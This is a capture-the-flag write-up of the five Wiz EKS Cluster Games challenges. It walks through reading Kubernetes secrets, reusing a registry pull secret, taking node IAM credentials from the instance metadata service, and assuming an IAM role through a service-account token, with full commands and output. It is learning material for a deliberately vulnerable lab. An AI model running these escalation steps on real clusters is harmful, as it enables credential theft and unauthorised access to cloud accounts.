Wiz_EKS_Challenge_WP

Link: https://eksclustergames.com/challenge/1

  • Fun and worth playing

Challenge 1

The pod's service-account permissions:

{
  "secrets": [
    "get",
    "list"
  ]
}
root@wiz-eks-challenge:~# kubectl get secrets
NAME         TYPE     DATA   AGE
log-rotate   Opaque   1      2y166d

Try reading it: kubectl get secret log-rotate -o yaml

root@wiz-eks-challenge:~# kubectl get secret log-rotate -o yaml
apiVersion: v1
data:
  flag: d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ==
kind: Secret
metadata:
  creationTimestamp: "2023-11-01T13:02:08Z"
  name: log-rotate
  namespace: challenge1
  resourceVersion: "277935903"
  uid: 03f6372c-b728-4c5b-ad28-70d5af8d387c
type: Opaque

Base64-decode it to get the flag: wiz_eks_challenge{omg_over_privileged_secret_access}
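The decode step can be reproduced anywhere with base64; the value below is copied straight from the secret's YAML above:

```shell
# Decode the flag field of the log-rotate secret (value taken from the YAML above).
FLAG_B64="d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ=="
printf %s "$FLAG_B64" | base64 -d
# -> wiz_eks_challenge{omg_over_privileged_secret_access}
```

kubectl can also extract the field directly, e.g. with -o jsonpath='{.data.flag}', before piping to base64 -d.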

Challenge 2

This time the service-account permissions are:

{
  "secrets": [
    "get"
  ],
  "pods": [
    "list",
    "get"
  ]
}

The hint for this one: check the container registries.

root@wiz-eks-challenge:~# kubectl get secrets
Error from server (Forbidden): secrets is forbidden: User "system:serviceaccount:challenge2:service-account-challenge2" cannot list resource "secrets" in API group "" in the namespace "challenge2"
root@wiz-eks-challenge:~# kubectl get pods
NAME                    READY   STATUS    RESTARTS      AGE
database-pod-14f9769b   1/1     Running   6 (28d ago)   245d
root@wiz-eks-challenge:~# kubectl get pods database-pod-14f9769b -o yaml
apiVersion: v1
kind: Pod
metadata:
  annotations:
    pulumi.com/autonamed: "true"
  creationTimestamp: "2025-08-13T10:48:59Z"
  generation: 1
  name: database-pod-14f9769b
  namespace: challenge2
  resourceVersion: "404049975"
  uid: e1c6b56d-15d5-491d-9cc8-fa6d739b62c2
spec:
  containers:
  - image: eksclustergames/base_ext_image
    imagePullPolicy: Always
    name: my-container
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-8cw9p
      readOnly: true
  dnsPolicy: ClusterFirst
  enableServiceLinks: true
  imagePullSecrets:
  - name: registry-pull-secrets-16ae8e51
  nodeName: ip-192-168-6-0.us-west-1.compute.internal
  preemptionPolicy: PreemptLowerPriority
  priority: 0
  restartPolicy: Always
  schedulerName: default-scheduler
  securityContext: {}
  serviceAccount: default
  serviceAccountName: default
  terminationGracePeriodSeconds: 30
  tolerations:
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 300
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 300
  volumes:
  - name: kube-api-access-8cw9p
    projected:
      defaultMode: 420
      sources:
      - serviceAccountToken:
          expirationSeconds: 3607
          path: token
      - configMap:
          items:
          - key: ca.crt
            path: ca.crt
          name: kube-root-ca.crt
      - downwardAPI:
          items:
          - fieldRef:
              apiVersion: v1
              fieldPath: metadata.namespace
            path: namespace
status:
  conditions:
  - lastProbeTime: null
    lastTransitionTime: "2025-08-13T10:49:05Z"
    status: "True"
    type: PodReadyToStartContainers
  - lastProbeTime: null
    lastTransitionTime: "2025-08-13T10:48:59Z"
    status: "True"
    type: Initialized
  - lastProbeTime: null
    lastTransitionTime: "2026-03-19T01:02:56Z"
    status: "True"
    type: Ready
  - lastProbeTime: null
    lastTransitionTime: "2026-03-19T01:02:56Z"
    status: "True"
    type: ContainersReady
  - lastProbeTime: null
    lastTransitionTime: "2025-08-13T10:48:59Z"
    status: "True"
    type: PodScheduled
  containerStatuses:
  - containerID: containerd://11e6d2869044633eddbb2fcc5771927015d932c6114883bb4f160a21e693d5f5
    image: docker.io/eksclustergames/base_ext_image:latest
    imageID: docker.io/eksclustergames/base_ext_image@sha256:dc7972c9abff930285186786ba21cdf44a401e91ece2dddd4b487a6028fb3804
    lastState:
      terminated:
        containerID: containerd://61d0da6a4a373824e1b6330c489361b898bb00c5bf04f9b8038364891c963501
        exitCode: 0
        finishedAt: "2026-03-19T01:02:55Z"
        reason: Completed
        startedAt: "2026-02-10T18:40:38Z"
    name: my-container
    ready: true
    resources: {}
    restartCount: 6
    started: true
    state:
      running:
        startedAt: "2026-03-19T01:02:56Z"
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-8cw9p
      readOnly: true
      recursiveReadOnly: Disabled
  hostIP: 192.168.6.0
  hostIPs:
  - ip: 192.168.6.0
  phase: Running
  podIP: 192.168.27.229
  podIPs:
  - ip: 192.168.27.229
  qosClass: BestEffort
  startTime: "2025-08-13T10:48:59Z"

Note the imagePullSecrets entry:

  • name: registry-pull-secrets-16ae8e51

A secret like this normally stores registry authentication config so the node can pull from private repositories. In other words, we now have the secret's name, which indirectly works around our inability to list secrets (we still have get).

root@wiz-eks-challenge:~# kubectl get secret registry-pull-secrets-16ae8e51 -o yaml
apiVersion: v1
data:
  .dockerconfigjson: ...
kind: Secret
metadata:
  annotations:
    pulumi.com/autonamed: "true"
  creationTimestamp: "2025-08-13T10:48:40Z"
  name: registry-pull-secrets-16ae8e51
  namespace: challenge2
  resourceVersion: "280899175"
  uid: c9229447-11c6-40c4-a5a3-ef255ac82306
type: kubernetes.io/dockerconfigjson

  • {"auths": {"index.docker.io/v1/": {"auth": "..."}}}

Decoding the auth value in turn gives eksclustergames:dckr_pat_…

At this point we have the registry username and password.
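The two-stage decode can be sketched offline. DOCKERCFG below is a made-up stand-in for the real secret (its auth field is base64 of "user:password"):

```shell
# Hypothetical .dockerconfigjson after the first base64 decode; "auth" is base64("user:password").
DOCKERCFG='{"auths":{"index.docker.io/v1/":{"auth":"dXNlcjpwYXNzd29yZA=="}}}'
# Pull out the auth field and decode it to user:password form:
AUTH=$(printf %s "$DOCKERCFG" | sed -n 's/.*"auth":"\([^"]*\)".*/\1/p')
printf %s "$AUTH" | base64 -d
# -> user:password
```

The same chain applied to the real secret is what yields eksclustergames plus the dckr_pat_ access token.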

The challenge then hints that crane is pre-installed in the environment. What is it? crane is a CLI for interacting with container registries, so we can log in with the stolen credentials via crane auth login:

root@wiz-eks-challenge:~# echo "dckr_pat_..." | crane auth login index.docker.io -u eksclustergames --password-stdin
2026/04/16 10:36:09 logged in via /home/user/.docker/config.json

But it seems we cannot list this account's repositories, so back to the earlier YAML:

image: docker.io/eksclustergames/base_ext_image:latest
imageID: docker.io/eksclustergames/base_ext_image@sha256:a17a9428af1cc25f2158dfba0fe3662cad25b7627b09bf24a915a70831d82623

Go look up information about base_ext_image:latest:

root@wiz-eks-challenge:~# crane config eksclustergames/base_ext_image:latest
{"architecture":"amd64","config":{"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":["/bin/sleep","3133337"],"ArgsEscaped":true},"created":"2025-08-13T14:12:01.893680673+03:00","history":[{"created":"2024-09-26T21:31:42Z","created_by":"BusyBox 1.37.0 (glibc), Debian 12"},{"created":"2025-08-13T14:12:01.893680673+03:00","created_by":"RUN sh -c echo 'wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}' \u003e /flag.txt # buildkit","comment":"buildkit.dockerfile.v0"},{"created":"2025-08-13T14:12:01.893680673+03:00","created_by":"CMD [\"/bin/sleep\" \"3133337\"]","comment":"buildkit.dockerfile.v0","empty_layer":true}],"os":"linux","rootfs":{"type":"layers","diff_ids":["sha256:65014c70e84b6817fac42bb201ec5c1ea460a8da246cac0e481f5c9a9491eac0","sha256:f6d5df3e8d8c94ade34d5100efa0b1521a481a4b12d4a4c0bcb4eb92013710a1"]}}
root@wiz-eks-challenge:~# crane ls eksclustergames/base_ext_image
latest

The image's build history leaks the flag: wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}
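A quick way to fish flag-shaped strings out of that config JSON; CONFIG below is an abridged, hypothetical stand-in for the real crane output:

```shell
# Abridged stand-in for `crane config` output; only the history entry matters here.
CONFIG='{"history":[{"created_by":"RUN sh -c echo '\''wiz_eks_challenge{example_flag}'\'' > /flag.txt # buildkit"}]}'
printf %s "$CONFIG" | grep -o 'wiz_eks_challenge{[^}]*}'
# -> wiz_eks_challenge{example_flag}
```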

Challenge 3: Image Inquisition

A pod's image holds more than just code. Dive deep into its ECR repository, inspect the image layers, and uncover the hidden secret.

Remember: You are running inside a compromised EKS pod.

For your convenience, the crane utility is already pre-installed on the machine.
The service-account permissions:

{
  "pods": [
    "list",
    "get"
  ]
}

So we can inspect a pod:

root@wiz-eks-challenge:~# kubectl get pod accounting-pod-acbd5209 -o yaml
apiVersion: v1
kind: Pod
metadata:
  annotations:
    pulumi.com/autonamed: "true"
  creationTimestamp: "2025-08-13T11:22:21Z"
  generation: 1
  name: accounting-pod-acbd5209
  namespace: challenge3
  resourceVersion: "404063026"
  uid: ff755d4c-5581-4673-8e2f-5bd999882d5d
spec:
  containers:
  - image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4
    imagePullPolicy: IfNotPresent
    name: accounting-container
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-n7q8h
      readOnly: true
  dnsPolicy: ClusterFirst
  enableServiceLinks: true
  nodeName: ip-192-168-63-122.us-west-1.compute.internal
  preemptionPolicy: PreemptLowerPriority
  priority: 0
  restartPolicy: Always
  schedulerName: default-scheduler
  securityContext: {}
  serviceAccount: default
  serviceAccountName: default
  terminationGracePeriodSeconds: 30
  tolerations:
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 300
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 300
  volumes:
  - name: kube-api-access-n7q8h
    projected:
      defaultMode: 420
      sources:
      - serviceAccountToken:
          expirationSeconds: 3607
          path: token
      - configMap:
          items:
          - key: ca.crt
            path: ca.crt
          name: kube-root-ca.crt
      - downwardAPI:
          items:
          - fieldRef:
              apiVersion: v1
              fieldPath: metadata.namespace
            path: namespace
status:
  conditions:
  - lastProbeTime: null
    lastTransitionTime: "2025-08-13T11:22:22Z"
    status: "True"
    type: PodReadyToStartContainers
  - lastProbeTime: null
    lastTransitionTime: "2025-08-13T11:22:21Z"
    status: "True"
    type: Initialized
  - lastProbeTime: null
    lastTransitionTime: "2026-03-19T01:36:10Z"
    status: "True"
    type: Ready
  - lastProbeTime: null
    lastTransitionTime: "2026-03-19T01:36:10Z"
    status: "True"
    type: ContainersReady
  - lastProbeTime: null
    lastTransitionTime: "2025-08-13T11:22:21Z"
    status: "True"
    type: PodScheduled
  containerStatuses:
  - containerID: containerd://381e80b40a78de9329e855b79082b90007f327771a915cdd38688682e513f601
    image: sha256:c5e09ea1551a1976284b15c1d5e856cbda91b98e04a7e88f517a182f29b0c914
    imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4
    lastState:
      terminated:
        containerID: containerd://7e841671e1a9e9613f18070cd76408e69adff039713f2e9bcf834f413abdb3f2
        exitCode: 0
        finishedAt: "2026-03-19T01:36:08Z"
        reason: Completed
        startedAt: "2026-02-10T19:13:51Z"
    name: accounting-container
    ready: true
    resources: {}
    restartCount: 6
    started: true
    state:
      running:
        startedAt: "2026-03-19T01:36:09Z"
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-n7q8h
      readOnly: true
      recursiveReadOnly: Disabled
  hostIP: 192.168.63.122
  hostIPs:
  - ip: 192.168.63.122
  phase: Running
  podIP: 192.168.38.4
  podIPs:
  - ip: 192.168.38.4
  qosClass: BestEffort
  startTime: "2025-08-13T11:22:21Z"

Here we see the first hint: Try contacting the IMDS to get the ECR credentials.

I asked an AI what IMDS is: it is short for Instance Metadata Service.

IMDS is a special internal service that runs at the link-local address 169.254.169.254 on every EC2 instance (EKS nodes included). Applications on the instance can query it for metadata about the instance itself, for example:

Instance ID, private IP, hostname

IAM role name and temporary credentials (AccessKey, SecretKey, Token)

User data

Network configuration, security groups, and so on

How this relates to ECR credentials:

When you need to pull private Amazon ECR (Elastic Container Registry) images on an EKS node (or any EC2 instance), there is no need to hardcode a username and password: ECR authentication is based on AWS IAM.

An old acquaintance: this is the same endpoint classically hit via SSRF to steal credentials.

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

The YAML also shows the container's pull address, 688655246681.dkr.ecr.us-west-1.amazonaws.com. Now we imitate the previous challenge: there we read a secret to get credentials directly; here we go through the instance metadata instead (the credentials must be obtainable locally, since ECR relies on IAM). And since we are in EKS, which runs on AWS, the metadata is easy to read:

root@wiz-eks-challenge:~# curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 511 100 511 0 0 3494 0 --:--:-- --:--:-- --:--:-- 3500
{
  "AccessKeyId": "...",
  "Expiration": "2026-04-16 11:54:39+00:00",
  "SecretAccessKey": "...",
  "SessionToken": "..."
}

Note that the metadata address is always the same fixed IP.
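The IMDS response can then be wired into the aws CLI via environment variables. A minimal sketch: CREDS is a hypothetical stand-in for the curl output above, and the sed-based extractor assumes the compact one-line JSON form (jq would also work):

```shell
# Stand-in for the IMDS credentials JSON (real values come from the curl above).
CREDS='{"AccessKeyId":"ASIAEXAMPLE","SecretAccessKey":"secretEXAMPLE","SessionToken":"tokenEXAMPLE"}'
# Crude field extractor for one-line JSON.
json_field() { printf %s "$CREDS" | sed -n "s/.*\"$1\":\"\([^\"]*\)\".*/\1/p"; }
export AWS_ACCESS_KEY_ID=$(json_field AccessKeyId)
export AWS_SECRET_ACCESS_KEY=$(json_field SecretAccessKey)
export AWS_SESSION_TOKEN=$(json_field SessionToken)
echo "$AWS_ACCESS_KEY_ID"
# -> ASIAEXAMPLE
```

(On the challenge box the aws CLI already picks the node credentials up, so this is mainly useful when replaying the attack elsewhere.)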

Then use the aws CLI to obtain an ECR login password and feed it to crane:

root@wiz-eks-challenge:~# aws ecr get-login-password|crane auth login 688655246681.dkr.ecr.us-west-1.amazonaws.com -u AWS --password-stdin
root@wiz-eks-challenge:~# crane ls 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7
ec47783c-container
root@wiz-eks-challenge:~# crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7:ec47783c-container
{"architecture":"amd64","config":{"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":["/bin/sleep","3133337"],"ArgsEscaped":true},"created":"2025-08-13T11:22:17.044629915Z","history":[{"created":"2024-09-26T21:31:42Z","created_by":"BusyBox 1.37.0 (glibc), Debian 12"},{"created":"2025-08-13T11:22:17.044629915Z","created_by":"RUN sh -c #ARTIFACTORY_USERNAME=challenge@eksclustergames.com ARTIFACTORY_TOKEN=wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future} ARTIFACTORY_REPO=base_repo /bin/sh -c pip install setuptools --index-url intrepo.eksclustergames.com # buildkit # buildkit","comment":"buildkit.dockerfile.v0"},{"created":"2025-08-13T11:22:17.044629915Z","created_by":"CMD [\"/bin/sleep\" \"3133337\"]","comment":"buildkit.dockerfile.v0","empty_layer":true}],"moby.buildkit.cache.v0":"W3siZGlnZXN0Ijoic2hhMjU2OjBhMDNhMjBmMDY1M2I5MDVkMDA3ZmZmMDUzZGRiZjAyNGRiMTY0ODAwMTdhODU0ZmE5Y2I0ZDYxOTI0NTc4NzEifSx7ImxheWVycyI6W3sibGF5ZXIiOjEsImNyZWF0ZWRBdCI6IjIwMjUtMDgtMTNUMTE6MjI6MTcuMDUxMDE2NzE1WiJ9XSwiZGlnZXN0Ijoic2hhMjU2OjM4YjAzMDUxMjRlYTk4YjQ0YmJmOWU2YWYyYTY0YjM5Y2UyZjQ0NTRkZWRjMWY4MWM3ZWU1OTBiZDk3NjVlZTgiLCJpbnB1dHMiOltbeyJzZWxlY3RvciI6InNoYTI1Njo4YTVlZGFiMjgyNjMyNDQzMjE5ZTA1MWU0YWRlMmQxZDViYmM2NzFjNzgxMDUxYmYxNDM3ODk3Y2JkZmVhMGYxIiwibGluayI6MH0seyJzZWxlY3RvciI6InNoYTI1Njo4YTVlZGFiMjgyNjMyNDQzMjE5ZTA1MWU0YWRlMmQxZDViYmM2NzFjNzgxMDUxYmYxNDM3ODk3Y2JkZmVhMGYxIiwibGluayI6Mn1dXX0seyJkaWdlc3QiOiJzaGEyNTY6NzBkODBkMzI0NGE4ZGQ1NTEwNDMzYTk0ZGQxZWZhYzhkMjAzMjY2MjJlYTJmMTM3YThkMGY4MTM4MGU2MWRjYiJ9XQ==","os":"linux","rootfs":{"type":"layers","diff_ids":["sha256:65014c70e84b6817fac42bb201ec5c1ea460a8da246cac0e481f5c9a9491eac0","sha256:049623e0f38ab81266b63bcf3825d96932b7752d1ca32a4c035b73a537dcaa1b"]}}

This yields the flag:

wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future}

Challenge 4: Pod Break

You’re inside a vulnerable pod on an EKS cluster. Your pod’s service-account has no permissions. Can you navigate your way to access the EKS Node’s privileged service-account?

Please be aware: Due to security considerations aimed at safeguarding the CTF infrastructure, the node has restricted permissions

EKS (Amazon Elastic Kubernetes Service) is AWS's managed Kubernetes service.

The degrees of freedom keep growing: we are already inside a pod in the EKS cluster, that pod's service account has no permissions, and the goal is to reach the EKS node's privileged service account. You could also call this a container escape.

About all we can try is aws sts get-caller-identity:

{
  "UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0bd90a7fe60cdb9f7",
  "Account": "688655246681",
  "Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0bd90a7fe60cdb9f7"
}

So the pod is effectively running with the node's IAM role. Now it's a matter of using whatever cloud-service commands are available to escalate: a textbook case of a low-privileged pod service account escalating through the cloud provider's APIs:

aws eks get-token --cluster-name eks-challenge-cluster > eks-token.json

Once we have this token we can authenticate kubectl as a new identity. The cluster name here is eks-challenge-cluster.
root@wiz-eks-challenge:~# ls
eks-token.json
root@wiz-eks-challenge:~# cat *
{
  "kind": "ExecCredential",
  "apiVersion": "client.authentication.k8s.io/v1beta1",
  "spec": {},
  "status": {
    "expirationTimestamp": "2026-04-16T11:34:33Z",
    "token": "..."
  }
}

Now use this token with kubectl to drive the cluster:

kubectl auth can-i --list --token="..."
kubectl auth can-i --list --token="..."
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]

Note this invocation: kubectl auth can-i --list --token=... enumerates the permissions held by the account behind the token.

root@wiz-eks-challenge:~# kubectl get secret --token="..."
NAME        TYPE     DATA   AGE
node-flag   Opaque   1      2y166d
apiVersion: v1
data:
  flag: d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=
kind: Secret
metadata:
  creationTimestamp: "2023-11-01T12:27:57Z"
  name: node-flag
  namespace: challenge4
  resourceVersion: "277935898"
  uid: 26461a29-ec72-40e1-adc7-99128ce664f7
type: Opaque

Got it! Decoding the base64 gives wiz_eks_challenge{only_a_real_pro_can_navigate_IMDS_to_EKS_congrats}

Challenge 5: Container Secrets Infrastructure

Earlier, whenever I got stuck I went straight to writeups; let's give the final level a proper finish.

You’ve successfully transitioned from a limited Service Account to a Node Service Account! Great job. Your next challenge is to move from the EKS to the AWS account. Can you acquire the AWS role of the s3access-sa service account, and get the flag?

Also very clear: this time it's privilege escalation on the AWS (IAM) side.

The challenge provides some material for a permissions audit:

The IAM policy on the target role:

{
  "Policy": {
    "Statement": [
      {
        "Action": [
          "s3:GetObject",
          "s3:ListBucket"
        ],
        "Effect": "Allow",
        "Resource": [
          "arn:aws:s3:::challenge-flag-bucket-3ff1ae2",
          "arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"
        ]
      }
    ],
    "Version": "2012-10-17"
  }
}

Its trust policy:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}

(So there is an IAM role whose trust policy lets any Service Account from this EKS cluster assume it.)

And our Kubernetes permissions:

{
  "secrets": [
    "get",
    "list"
  ],
  "serviceaccounts": [
    "get",
    "list"
  ],
  "pods": [
    "get",
    "list"
  ],
  "serviceaccounts/token": [
    "create"
  ]
}

root@wiz-eks-challenge:~# aws s3 ls s3://challenge-flag-bucket-3ff1ae2

An error occurred (AccessDenied) when calling the ListObjectsV2 operation: User: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0bd90a7fe60cdb9f7 is not authorized to perform: s3:ListBucket on resource: "arn:aws:s3:::challenge-flag-bucket-3ff1ae2" because no identity-based policy allows the s3:ListBucket action

Now the idea must be to use the cluster-side permissions to get through. Auditing them:

There is an IAM role whose trust policy allows any Service Account from this EKS cluster to assume it.
If you can obtain a JWT token for any Service Account in the cluster (for example your current pod's SA token, or another SA's token read from secrets), you can assume that IAM role and gain its AWS permissions.
The role may hold elevated permissions (say over EKS, EC2, or S3), making it the key step for escalation.
root@wiz-eks-challenge:~# kubectl auth can-i  --list --token="..."
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]

We can create a token for debug-sa, the only SA we're allowed to mint tokens for:

...

The JWT token created this way carries the cluster's OIDC identity, so in theory it should satisfy the trust policy.
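You can sanity-check the claims of such a token offline; a real SA token (typically minted with kubectl create token debug-sa --audience sts.amazonaws.com) is a signed JWT in header.payload.signature form. The sketch below builds a hypothetical unsigned token just to demonstrate the payload-decoding step:

```shell
# Build a fake header.payload. token purely to demonstrate the decode; NOT a real SA token.
b64url() { base64 | tr -d '=\n' | tr '+/' '-_'; }
HEADER=$(printf %s '{"alg":"none"}' | b64url)
CLAIMS=$(printf %s '{"aud":["sts.amazonaws.com"],"sub":"system:serviceaccount:challenge5:debug-sa"}' | b64url)
TOKEN="$HEADER.$CLAIMS."
# Grab the middle (payload) segment, map base64url back to base64, restore padding, decode:
PAYLOAD=$(printf %s "$TOKEN" | cut -d. -f2 | tr '_-' '/+')
case $(( ${#PAYLOAD} % 4 )) in
  2) PAYLOAD="$PAYLOAD==" ;;
  3) PAYLOAD="$PAYLOAD=" ;;
esac
printf %s "$PAYLOAD" | base64 -d
# -> {"aud":["sts.amazonaws.com"],"sub":"system:serviceaccount:challenge5:debug-sa"}
```

Running the same decode on the real token should show aud sts.amazonaws.com and the debug-sa subject; if aud is wrong, STS will reject the AssumeRoleWithWebIdentity call.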

But note: when generating the token you must also pass --audience sts.amazonaws.com (to satisfy the aud condition in the trust policy).

The final step is:

aws sts assume-role-with-web-identity \
  --role-arn "<ROLE_ARN>" \
  --role-session-name "ctf-session" \
  --web-identity-token "..."

But we still need the actual ROLE_ARN. Looking back at what we can query:

kubectl get serviceaccount debug-sa -n challenge5 -o yaml --token="..."
apiVersion: v1
kind: ServiceAccount
metadata:
  annotations:
    description: This is a dummy service account with empty policy attached
    eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e
  creationTimestamp: "2023-10-31T20:07:37Z"
  name: debug-sa
  namespace: challenge5
  resourceVersion: "671929"
  uid: 6cb6024a-c4da-47a9-9050-59c8c7079904

So repeat the assume-role call with this ARN, obtaining:

root@wiz-eks-challenge:~# aws sts assume-role-with-web-identity \
> --role-arn "arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e" \
> --role-session-name "Sh_eePppp" \
> --web-identity-token "..."
{
  "Credentials": {
    "AccessKeyId": "...",
    "SecretAccessKey": "...",
    "SessionToken": "...",
    "Expiration": "2026-04-16T13:01:41+00:00"
  },
  "SubjectFromWebIdentityToken": "system:serviceaccount:challenge5:debug-sa",
  "AssumedRoleUser": {
    "AssumedRoleId": "AROA2AVYNEVM6G5PAIL7U:Sh_eePppp",
    "Arn": "arn:aws:sts::688655246681:assumed-role/challengeTestRole-fc9d18e/Sh_eePppp"
  },
  "Provider": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
  "Audience": "sts.amazonaws.com"
}

But the permissions kept being wrong. The issue is challengeTestRole-fc9d18e itself: we can indeed assume it, but it cannot access the S3 bucket (its description even says it has an empty policy attached). So back to kubectl:

kubectl get serviceaccount --token="..."
NAME          SECRETS   AGE
debug-sa      0         2y167d
default       0         2y167d
s3access-sa   0         2y167d

I had list and didn't list first; silly me. s3access-sa is the account we actually want, and its role-arn annotation is:

arn:aws:iam::688655246681:role/challengeEksS3Role

We still use debug-sa to create the JWT token:

aws sts assume-role-with-web-identity \
  --role-arn "arn:aws:iam::688655246681:role/challengeEksS3Role" \
  --role-session-name "sheep" \
  --web-identity-token "..."

Note: we can only view s3access-sa's role; we cannot create a token for it. That doesn't matter, because the trust policy accepts any Service Account from the cluster, so debug-sa's token works. Honestly, this came down to poor reconnaissance on my part, plus a still-incomplete understanding of IAM.

root@wiz-eks-challenge:~# aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag ./flag
download: s3://challenge-flag-bucket-3ff1ae2/flag to ./flag
Killed
root@wiz-eks-challenge:~# cat flag
wiz_eks_challenge{w0w_y0u_really_are_4n_eks_and_aws_exp1oitation_legend}

I should go back over these commands later; permission management makes up a large share of cloud security.

This range is not especially hard, but it escalates layer by layer and is a great entry point to cloud security.

Closing

That's a wrap. Over two hours of playing straight through; time for a rest.

https://eksclustergames.com/finisher/n0Osa6BR